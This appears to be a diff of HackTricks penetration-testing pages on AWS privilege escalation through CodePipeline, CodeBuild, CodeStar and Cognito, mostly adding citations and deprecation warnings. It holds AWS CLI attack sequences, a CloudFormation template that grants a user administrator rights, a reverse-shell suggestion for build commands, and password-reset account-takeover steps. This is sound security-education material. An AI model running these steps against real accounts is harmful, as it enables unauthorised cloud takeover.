+- [4] [Build specification reference for CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html)
+- [5] [CreateProject - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_CreateProject.html)
+- [6] [UpdateProject - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/APIReference/API_UpdateProject.html)
+- [7] [Grant a user permissions to pass a role to an AWS service](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [8] [Allow CodeBuild to interact with other AWS services](https://docs.aws.amazon.com/codebuild/latest/userguide/setting-up-service-role.html)
+- [9] [Container credential provider - AWS SDKs and Tools](https://docs.aws.amazon.com/sdkref/latest/guide/feature-container-credentials.html)
+- [10] [Best practices for IAM roles in Amazon ECS](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/security-iam-roles.html)
+- [11] [Amazon ECS environment variables](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs-environment-variables.html)
+- [12] [Debug builds with Session Manager - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/session-manager.html)
+- [13] [warnings — Warning control — Python 3.14 documentation](https://docs.python.org/3/library/warnings.html)
+- [14] [antigravity.py at 3.12 - python/cpython](https://github.com/python/cpython/blob/3.12/Lib/antigravity.py)
+- [15] [webbrowser — Convenient web-browser controller — Python 3.14 documentation](https://docs.python.org/3/library/webbrowser.html)
+- [16] [Getting started with CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/getting-started-overview.html)
+- [17] [AWS CodeBuild + S3 == Privilege Escalation](https://www.shielder.com/blog/2023/07/aws-codebuild--s3-privilege-escalation/)
+- [18] [AWS CodeBuild Default ECR IAM Policy vulnerability](https://www.asxconsulting.co.uk/blog/codebuild/)
+- [19] [Environment variables not being set on AWS CODEBUILD](https://stackoverflow.com/questions/50706276/environment-variables-not-being-set-on-aws-codebuild)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Codepipeline Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## codepipeline
 
 For more info about codepipeline check:
@@ -10,31 +8,44 @@ For more info about codepipeline check:
 ../../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md
 {{#endref}}
 
-### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution`
+### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject`, `codepipeline:StartPipelineExecution`
 
-When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them.
+CodePipeline associates a pipeline with a service role, and CodeBuild requires a service role for every build project. Passing a role to either service requires `iam:PassRole`; AWS also lists `codebuild:CreateProject` and `iam:PassRole` together for project creation. If the selected service role is over-permissive, a build can perform the actions allowed by that role.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
-Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...)
+The pipeline must also be able to read its configured source (S3, ECR, GitHub, Bitbucket, and so on). For a private source, the relevant CodePipeline service role or source connection needs access to the repository or bucket.<sup>[[5]](#references)</sup>
 
-I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:<several>`
+In a console-based test, the permissions above were not the List/Get permissions needed to create a CodePipeline. The web flow also requested: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:<several>`.
 
-During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise:
+During **build-project creation**, the console can accept inline build commands or a buildspec path, and CodeBuild runs those commands in the build environment. The `privilegedMode` setting is intended for Docker builds and enables Docker-daemon access when configured; it does not grant the IAM role. An attacker who controls the build commands can therefore execute code with the project's service-role permissions (for example, a reverse shell).<sup>[[3]](#references)[[4]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ![AWS CodeBuild buildspec name field set to env during build project creation](<../../../images/image (276).png>)
 
 ![AWS CodeBuild privileged mode checkbox enabled for elevated build privileges](<../../../images/image (181).png>)
 
-### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution`
+### `codebuild:UpdateProject`, `codepipeline:UpdatePipeline`, `codepipeline:StartPipelineExecution`
 
-It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions.
+`codebuild:UpdateProject` can change build-project settings such as the source and buildspec; changing its service role requires `iam:PassRole`. `codepipeline:UpdatePipeline` can replace the pipeline structure and stages, while `codepipeline:StartPipelineExecution` starts processing a source revision. AWS documents that an existing pipeline cannot be assigned a different service role, but these permissions can still let an attacker point an existing pipeline at an altered CodeBuild project or action configuration and execute commands under the project's existing role.<sup>[[2]](#references)[[3]](#references)[[8]](#references)[[9]](#references)[[10]](#references)[[12]](#references)</sup>
 
-### `codepipeline:pollforjobs`
+### `codepipeline:PollForJobs`
 
-[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
+`PollForJobs` is valid only for custom action types. For a matching pending job, the response can contain temporary credentials for the S3 artifact bucket when the action needs input or output artifacts, as well as secret values configured for that action. This permission can therefore expose artifact access and action secrets in pipelines that use custom actions; it does not poll AWS- or third-party-owned action types.<sup>[[11]](#references)</sup>
 
-> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**.
+See the [AWS `PollForJobs` API reference](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) for the response fields and action-type restriction.<sup>[[11]](#references)</sup>
+
+## References
+
+- [1] [Getting started with CodePipeline - AWS CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/userguide/getting-started-codepipeline.html)
+- [2] [Grant a user permissions to pass a role to an AWS service - AWS Identity and Access Management](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [3] [AWS CodeBuild permissions reference](https://docs.aws.amazon.com/codebuild/latest/userguide/auth-and-access-control-permissions-reference.html)
+- [4] [Allow CodeBuild to interact with other AWS services - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/setting-up-service-role.html)
+- [5] [Create a pipeline, stages, and actions - AWS CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/userguide/pipelines-create.html)
+- [6] [Shells and commands in build environments - AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/build-env-ref-cmd.html)
+- [7] [Create a build project in AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/create-project.html)
+- [8] [Change build project settings in AWS CodeBuild](https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html)
+- [9] [UpdatePipeline - CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_UpdatePipeline.html)
+- [10] [StartPipelineExecution - CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_StartPipelineExecution.html)
+- [11] [PollForJobs - CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
+- [12] [Create the CodePipeline service role - AWS CodePipeline](https://docs.aws.amazon.com/codepipeline/latest/userguide/pipelines-create-service-role.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
@@ -1,8 +1,9 @@
 # AWS - Codestar Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Codestar
+
+> [!WARNING]
+> AWS ended CodeStar project creation and console viewing on July 31, 2024. The techniques below describe historical behavior and may not work in current AWS accounts.<sup>[[1]](#references)</sup>
 
 You can find more information about codestar in:
 
@@ -12,7 +13,7 @@ codestar-createproject-codestar-associateteammember.md
 
 ### `iam:PassRole`, `codestar:CreateProject`
 
-With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page:
+With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**.<sup>[[8]](#references)[[10]](#references)</sup> Check the following page:
 
 {{#ref}}
 iam-passrole-codestar-createproject.md
@@ -20,7 +21,7 @@ iam-passrole-codestar-createproject.md
 
 ### `codestar:CreateProject`, `codestar:AssociateTeamMember`
 
-This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.
+This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[8]](#references)[[10]](#references)</sup>
 
 ```bash
 PROJECT_NAME="supercodestar"
@@ -41,9 +42,11 @@ aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \
     --remote-access-allowed
 ```
 
-If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`
+The OpsWorks lookup above returns the current IAM user's ARN in `UserProfile.IamUserArn`.<sup>[[7]](#references)</sup>
 
-**Potential Impact:** Privesc to the codestar policy generated. You can find an example of that policy in:
+If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember`.<sup>[[2]](#references)[[6]](#references)</sup>
+
+**Potential Impact:** Privesc to the codestar policy generated.<sup>[[8]](#references)[[10]](#references)</sup> You can find an example of that policy in:
 
 {{#ref}}
 codestar-createproject-codestar-associateteammember.md
@@ -52,25 +55,36 @@ codestar-createproject-codestar-associateteammember.md
 ### `codestar:CreateProjectFromTemplate`
 
 1. **Create a New Project:**
-   - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.
-     - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.
-     - This access specifically targets a stack associated with the `CodeStarWorker-<generic project name>-CloudFormation` IAM role.
+   - Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project.<sup>[[9]](#references)[[10]](#references)</sup>
+     - Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**.<sup>[[9]](#references)[[10]](#references)</sup>
+     - This access specifically targets a stack associated with the `CodeStarWorker-<generic project name>-CloudFormation` IAM role.<sup>[[9]](#references)[[10]](#references)</sup>
 2. **Update the Target Stack:**
-   - With the granted CloudFormation permissions, proceed to update the specified stack.
+   - With the granted CloudFormation permissions, proceed to update the specified stack.<sup>[[10]](#references)[[11]](#references)</sup>
      - The stack's name will typically conform to one of two patterns:
-       - `awscodestar-<generic project name>-infrastructure`
-       - `awscodestar-<generic project name>-lambda`
-       - The exact name depends on the chosen template (referencing the example exploit script).
+       - `awscodestar-<generic project name>-infrastructure`<sup>[[9]](#references)[[10]](#references)</sup>
+       - `awscodestar-<generic project name>-lambda`<sup>[[9]](#references)[[10]](#references)</sup>
+       - The exact name depends on the chosen template (referencing the example exploit script).<sup>[[9]](#references)[[10]](#references)</sup>
 3. **Access and Permissions:**
-   - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.
-   - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
+   - Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack.<sup>[[9]](#references)[[10]](#references)</sup>
+   - Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.<sup>[[10]](#references)</sup>
 
-For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\
-You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
+For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).<sup>[[10]](#references)</sup>\
+You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py).<sup>[[9]](#references)</sup>
 
-**Potential Impact:** Privesc to cloudformation IAM role.
+**Potential Impact:** Privesc to cloudformation IAM role.<sup>[[9]](#references)[[10]](#references)</sup>
+
+## References
+
+- [1] [CodeStar discontinuation discussion - AWS re:Post](https://repost.aws/questions/QUzfvPNaF6T3CVMRta-qcziA/code-star-vs-code-catalyst)
+- [2] [Actions, resources, and condition keys for AWS CodeStar](https://docs.aws.amazon.com/service-authorization/latest/reference/list_codestar.html)
+- [3] [create-project — AWS CLI 2.9.6 Command Reference](https://awscli.amazonaws.com/v2/documentation/api/2.9.6/reference/codestar/create-project.html)
+- [4] [associate-team-member — AWS CLI 2.0.34 Command Reference](https://awscli.amazonaws.com/v2/documentation/api/2.0.34/reference/codestar/associate-team-member.html)
+- [5] [list-team-members — AWS CLI 2.9.6 Command Reference](https://awscli.amazonaws.com/v2/documentation/api/2.9.6/reference/codestar/list-team-members.html)
+- [6] [CodeStar — botocore API Reference](https://botocore.amazonaws.com/v1/documentation/api/1.16.0/reference/services/codestar.html)
+- [7] [describe-my-user-profile — AWS CLI 2.1.21 Command Reference](https://awscli.amazonaws.com/v2/documentation/api/2.1.21/reference/opsworks/describe-my-user-profile.html)
+- [8] [Pacu CodeStar privilege-escalation scanner](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py)
+- [9] [CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py)
+- [10] [Escalating AWS IAM Privileges with an Undocumented CodeStar API](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/)
+- [11] [update-stack — AWS CLI 2.36.5 Command Reference](https://docs.aws.amazon.com/cli/latest/reference/cloudformation/update-stack.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
@@ -1,8 +1,9 @@
 # codestar:CreateProject, codestar:AssociateTeamMember
 
-{{#include ../../../../banners/hacktricks-training.md}}
+> [!WARNING]
+> AWS lists AWS CodeStar as fully shut down as of July 25, 2024. Treat this policy as a historical example for reviewing legacy configurations; it is not a current exploitation procedure.<sup>[[3]](#references)</sup>
 
-This is the created policy the user can privesc to (the project name was `supercodestar`):
+This is a historical example of the policy a user could obtain by becoming the `supercodestar` project owner. Rhino Security Labs documented the `codestar:CreateProject` and `codestar:AssociateTeamMember` path for making an IAM user the project owner and granting a new policy; AWS documents those APIs as project creation and team-member association.<sup>[[1]](#references)[[2]](#references)</sup>
 
 ```json
 {
@@ -78,7 +79,10 @@ This is the created policy the user can privesc to (the project name was `superc
 }
 ```
 
+## References
+
+- [1] [Escalating AWS IAM Privileges with an Undocumented CodeStar API](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/)
+- [2] [Actions, resources, and condition keys for AWS CodeStar](https://docs.aws.amazon.com/service-authorization/latest/reference/list_codestar.html)
+- [3] [Services in Full Shutdown](https://docs.aws.amazon.com/general/latest/gr/full_shutdown_services.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
@@ -1,10 +1,11 @@
 # iam:PassRole, codestar:CreateProject
 
-{{#include ../../../../banners/hacktricks-training.md}}
+> [!WARNING]
+> AWS discontinued support for creating and viewing AWS CodeStar projects on July 31, 2024; after that date, new projects cannot be created. Treat this as a historical privilege-escalation technique and verify the target account's service availability before relying on it.<sup>[[1]](#references)</sup>
 
-With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**.
+With `iam:PassRole` and `codestar:CreateProject`, a principal can submit a CodeStar project request that passes an IAM role to CodeStar. The request's toolchain can point to a CloudFormation template in S3, and CodeStar uses the supplied `roleArn` while provisioning the toolchain stack; a role with suitable IAM permissions can therefore turn the template into a privilege-escalation path.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[5]](#references)</sup>
 
-To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**:
+To reproduce the historical method, place `toolchain.json` in an S3 bucket readable from the target account. The `--toolchain` argument requires a source-code request too, so upload an `empty.zip` source archive alongside it. The following template creates an IAM managed policy, attaches it to the named user, and uses a wildcard action/resource statement to grant administrator-level permissions.<sup>[[2]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```json:toolchain.json
 {
@@ -36,9 +37,11 @@ Also **upload** this `empty zip` file to the **bucket**:
 empty.zip
 {{#endfile}}
 
-Remember that the **bucket with both files must be accessible by the victim account**.
+Remember that the **bucket with both files must be accessible by the victim account**.<sup>[[2]](#references)[[5]](#references)</sup>
 
-With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project:
+With both things uploaded, you can proceed to the **exploitation** by creating a **CodeStar** project.<sup>[[2]](#references)[[5]](#references)</sup>
+
+The example role ARN is account-specific; replace it with an existing role in the target account that the caller is allowed to pass. `iam:PassRole` passes the role and its permissions to the service and, under AWS's documented rules, applies to roles in the same account.<sup>[[4]](#references)[[5]](#references)</sup>
 
 ```bash
 PROJECT_NAME="supercodestar"
@@ -85,6 +88,15 @@ aws codestar create-project \
     --toolchain file://$TOOLCHAIN_PATH
 ```
 
-This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user.
+This exploit is based on the **Pacu** `PassExistingRoleToNewCodeStarProject` implementation: [the pinned source](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1831). It also includes a variation that creates an administrator policy for a role instead of attaching one to a user.<sup>[[5]](#references)</sup>
+
+## References
+
+- [1] [CodeStar discontinuation discussion - AWS re:Post](https://repost.aws/questions/QUzfvPNaF6T3CVMRta-qcziA/code-star-vs-code-catalyst)
+- [2] [create-project — AWS CLI Command Reference](https://awscli.amazonaws.com/v2/documentation/api/2.9.6/reference/codestar/create-project.html)
+- [3] [AWSCodeStarServiceRole - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSCodeStarServiceRole.html)
+- [4] [Grant a user permissions to pass a role to an AWS service - AWS IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html)
+- [5] [Pacu IAM privilege-escalation scan module (pinned commit)](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1831)
+- [6] [AWS::IAM::ManagedPolicy - AWS CloudFormation](https://docs.aws.amazon.com/AWSCloudFormation/latest/TemplateReference/aws-resource-iam-managedpolicy.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Cognito Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Cognito
 
 For more info about Cognito check:
@@ -12,15 +10,15 @@ For more info about Cognito check:
 
 ### Gathering credentials from Identity Pool
 
-As Cognito can grant **IAM role credentials** to both **authenticated** an **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (should be hardcoded on it) you can obtain new credentials and therefore privesc (inside an AWS account where you probably didn't even have any credential previously).
+As Cognito can grant **IAM role credentials** to both **authenticated** and **unauthenticated** **users**, if you locate the **Identity Pool ID** of an application (which is often exposed in client configuration) you can obtain new credentials and therefore privesc, even if you did not previously have credentials in the AWS account.<sup>[[1]](#references)[[2]](#references)[[37]](#references)</sup>
 
 For more information [**check this page**](../../aws-unauthenticated-enum-access/index.html#cognito).
 
-**Potential Impact:** Direct privesc to the services role attached to unauth users (and probably to the one attached to auth users).
+**Potential Impact:** Direct privesc to the service role attached to unauthenticated users, and potentially to the role attached to authenticated users.<sup>[[2]](#references)</sup>
 
 ### `cognito-identity:SetIdentityPoolRoles`, `iam:PassRole`
 
-With this permission you can **grant any cognito role** to the authenticated/unauthenticated users of the cognito app.
+With this permission you can assign IAM roles to the authenticated and unauthenticated identities in an identity pool. `iam:PassRole` may also be required when passing a role that grants permissions beyond the caller's existing access.<sup>[[3]](#references)[[5]](#references)</sup>
 
 ```bash
 aws cognito-identity set-identity-pool-roles \
@@ -34,13 +32,13 @@ aws cognito-identity get-id --identity-pool-id "eu-west-2:38b294756-2578-8246-90
 aws cognito-identity get-credentials-for-identity --identity-id "eu-west-2:195f9c73-4789-4bb4-4376-99819b6928374"
 ```
 
-If the cognito app **doesn't have unauthenticated users enabled** you might need also the permission `cognito-identity:UpdateIdentityPool` to enable it.
+If the identity pool **doesn't have unauthenticated identities enabled**, you might also need `cognito-identity:UpdateIdentityPool` to enable them.<sup>[[4]](#references)</sup>
 
-**Potential Impact:** Direct privesc to any cognito role.
+**Potential Impact:** Direct privesc to any IAM role assigned to the identity pool.<sup>[[2]](#references)[[3]](#references)</sup>
 
-### `cognito-identity:update-identity-pool`
+### `cognito-identity:UpdateIdentityPool`
 
-An attacker with this permission could set for example a Cognito User Pool under his control or any other identity provider where he can login as a **way to access this Cognito Identity Pool**. Then, just **login** on that user provider will **allow him to access the configured authenticated role in the Identity Pool**.
+An attacker with this permission could configure a Cognito User Pool under their control, or another identity provider where they can authenticate, as a way to access this identity pool. After authenticating with that provider, the attacker can request credentials for the configured authenticated role.<sup>[[1]](#references)[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 # This example is using a Cognito User Pool as identity provider
@@ -59,7 +57,7 @@ aws cognito-identity get-id \
     --identity-pool-id <id_pool_id> \
     --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
-# Get the identity_id from thr previous commnad response
+# Get the identity_id from the previous command response
 aws cognito-identity get-credentials-for-identity \
     --identity-id <identity_id> \
     --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
@@ -71,15 +69,15 @@ It's also possible to **abuse this permission to allow basic auth**:
 aws cognito-identity update-identity-pool \
     --identity-pool-id <value> \
     --identity-pool-name <value> \
-    --allow-unauthenticated-identities
+    --allow-unauthenticated-identities \
     --allow-classic-flow
 ```
 
-**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool.
+**Potential Impact**: Compromise the configured authenticated IAM role inside the identity pool.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ### `cognito-idp:AdminAddUserToGroup`
 
-This permission allows to **add a Cognito user to a Cognito group**, therefore an attacker could abuse this permission to add an user under his control to other groups with **better** privileges or **different IAM roles**:
+This permission allows an administrator to **add a Cognito user to a Cognito group**. An attacker could use it to add a user under their control to a group with **better** privileges or a **different IAM role**; group membership is reflected in token claims and can influence identity-pool role selection.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-add-user-to-group \
@@ -88,21 +86,21 @@ aws cognito-idp admin-add-user-to-group \
     --group-name <value>
 ```
 
-**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to User Pool Groups.
+**Potential Impact:** Privesc to other Cognito groups and IAM roles attached to user-pool groups.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### (`cognito-idp:CreateGroup` | `cognito-idp:UpdateGroup`), `iam:PassRole`
 
-An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles:
+An attacker with these permissions could **create or update groups** with IAM role ARNs that are usable by a compromised Cognito identity provider. If the attacker can also add a controlled user to the group, the resulting group claims can select that role for identity-pool credentials.<sup>[[5]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 aws cognito-idp create-group --group-name Hacked --user-pool-id <user-pool-id> --role-arn <role-arn>
 ```
 
-**Potential Impact:** Privesc to other Cognito IAM roles.
+**Potential Impact:** Privesc to other Cognito IAM roles, subject to the role trust policy and the identity-pool configuration.<sup>[[5]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ### `cognito-idp:AdminConfirmSignUp`
 
-This permission allows to **verify a signup**. By default anyone can sign in Cognito applications, if that is left, a user could create an account with any data and verify it with this permission.
+This permission allows an administrator to **confirm a user's sign-up** without a confirmation code. If self-service sign-up is enabled, an attacker could register an account and then confirm it with this permission.<sup>[[9]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-confirm-sign-up \
@@ -110,11 +108,11 @@ aws cognito-idp admin-confirm-sign-up \
     --username <value>
 ```
 
-**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users if you can register a new user. Indirect privesc to other app functionalities being able to confirm any account.
+**Potential Impact:** Indirect privesc to the identity-pool IAM role for authenticated users if the attacker can register a new user, plus access to application functionality that trusts confirmation state.<sup>[[2]](#references)[[9]](#references)</sup>
 
 ### `cognito-idp:AdminCreateUser`
 
-This permission would allow an attacker to create a new user inside the user pool. The new user is created as enabled, but will need to change its password.
+This permission allows an attacker to create a new user inside the user pool. When a password is supplied, the new user normally starts in `FORCE_CHANGE_PASSWORD` and must complete the first sign-in challenge; passwordless pools are an exception.<sup>[[10]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-create-user \
@@ -125,11 +123,11 @@ aws cognito-idp admin-create-user \
     [--temporary-password <value>]
 ```
 
-**Potential Impact:** Direct privesc to the identity pool IAM role for authenticated users. Indirect privesc to other app functionalities being able to create any user
+**Potential Impact:** Possible access to the identity-pool IAM role for authenticated users after completing the required sign-in flow, and indirect access to application functionality that trusts user creation.<sup>[[2]](#references)[[10]](#references)</sup>
 
 ### `cognito-idp:AdminEnableUser`
 
-This permissions can help in. a very edge-case scenario where an attacker found the credentials of a disabled user and he needs to **enable it again**.
+This permission can help in a very edge-case scenario where an attacker has credentials for a disabled user and needs to **enable that user again**.<sup>[[11]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-enable-user \
@@ -137,15 +135,15 @@ aws cognito-idp admin-enable-user \
     --username <value>
 ```
 
-**Potential Impact:** Indirect privesc to the identity pool IAM role for authenticated users and permissions of the user if the attacker had credentials for a disabled user.
+**Potential Impact:** Restores the disabled user's ability to authenticate and potentially reach the identity-pool IAM role or application permissions associated with that account.<sup>[[2]](#references)[[11]](#references)</sup>
 
 ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`**
 
-This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link.
+`AdminInitiateAuth` supports the server-side `ADMIN_USER_PASSWORD_AUTH` flow, and `AdminRespondToAuthChallenge` handles any follow-up challenge returned by the authentication flow.<sup>[[12]](#references)[[13]](#references)</sup> For more information, follow the [**method ADMIN_USER_PASSWORD_AUTH**](../../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth) link.
 
 ### `cognito-idp:AdminSetUserPassword`
 
-This permission would allow an attacker to **set a known password for any user**, usually resulting in a **direct account takeover** (especially if the victim doesn't have MFA enabled, or MFA is not enforced for the relevant auth flow/client).
+This permission allows an attacker to **set a known password for any user**. Setting `Permanent` to `true` permits immediate sign-in, usually resulting in a **direct account takeover** when the victim's applicable authentication flow does not require an additional factor.<sup>[[14]](#references)</sup>
 
 ```bash
 aws cognito-idp admin-set-user-password \
@@ -171,7 +169,7 @@ aws cognito-idp admin-set-user-password \
   --password "$NEW_PASS" \
   --permanent
 
-# 2) Login as the victim against a User Pool App Client (doesn't require AWS creds)
